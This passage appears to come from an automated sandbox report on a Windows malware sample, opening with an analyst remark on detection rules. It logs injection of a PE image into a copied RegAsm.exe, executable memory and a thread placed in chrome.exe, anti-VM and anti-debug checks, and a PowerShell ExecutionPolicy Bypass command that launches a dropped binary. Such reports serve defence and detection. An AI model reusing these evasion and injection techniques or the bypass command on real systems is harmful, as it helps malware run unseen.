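The rules are deliberately narrow: the RegAsm.exe rule fires on location rather than on the binary (it is a legitimate signed .NET tool, which is exactly why it was copied to Temp and used as the injection host), and tasklist alone is left out because administrators run it constantly; correlate it with the parent chain instead.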
Source: C:\Users\user\Desktop\ADFoyxP.exe | Process information set: NOOPENFILEERRORBOX (12 times)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX (4 times)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Process information set: NOOPENFILEERRORBOX (2 times)
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\ADFoyxP.exe Window / User API: threadDelayed 1518
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Window / User API: threadDelayed 9691
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Window / User API: threadDelayed 9941
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9884
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com API coverage: 4.2 %
Source: C:\Users\user\Desktop\ADFoyxP.exe TID: 2100 Thread sleep time: -142692s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7988 Thread sleep count: 9691 > 30
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com TID: 7988 Thread sleep time: -96910s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 4424 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe TID: 2692 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe TID: 9024 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe TID: 7248 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Thread sleep count: Count: 9691 delay: -10
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 23_2_0082A087
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 23_2_0082A1E2
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0081E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 23_2_0081E472
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 23_2_0082A570
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007EC622 FindFirstFileExW, 23_2_007EC622
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_008266DC FindFirstFileW,FindNextFileW,FindClose, 23_2_008266DC
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_008273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 23_2_008273D4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_00827333 FindFirstFileW,FindClose, 23_2_00827333
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0081D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 23_2_0081D921
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0081DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 23_2_0081DC54
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007B5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 23_2_007B5FC8
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1605583562.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_0082F4FF BlockInput, 23_2_0082F4FF
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 23_2_007B338B
Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007D5058 mov eax, dword ptr fs:[00000030h] 23_2_007D5058
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_008120AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 23_2_008120AA
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007E2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_007E2992
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007D0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_007D0BAF
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007D0D45 SetUnhandledExceptionFilter, 23_2_007D0D45
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 23_2_007D0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_007D0F91
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 25ECC340000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: CC340000
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900000 value starts with: 4D5A
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe protection: readonly
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900000
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900064
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9000C8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90012C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900190
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9001F4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900258
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9002BC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900320
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900384
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9003E8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90044C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9004B0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900514
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900578
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9005DC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900640
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9006A4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900708
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90076C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9007D0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900834
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900898
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9008FC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900960
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9009C4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900A28
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900A8C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900AF0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900B54
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900BB8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900C1C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900C80
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900CE4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900D48
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900DAC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900E10
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900E74
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900ED8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900F3C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900FA0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901004
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901068
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9010CC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901130
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901194
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9011F8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90125C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9012C0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901324
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901388
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9013EC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901450
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9014B4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901518
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90157C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9015E0
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901644
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9016A8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90170C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901770
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9017D4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901838
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90189C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901900
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901964
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9019C8
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901A2C
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901A90
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901AF4
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901B58
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901BBC
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901C20
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901C84
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901CE8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901D4CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901DB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901E14Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901E78Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901EDCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901F40Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901FA4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902008Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90206CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9020D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902134Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902198Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9021FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902260Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9022C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902328Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90238CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9023F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902454Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9024B8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90251CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902580Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9025E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902648Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9026ACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902710Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902774Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9027D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90283CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9028A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902904Jump to behavior
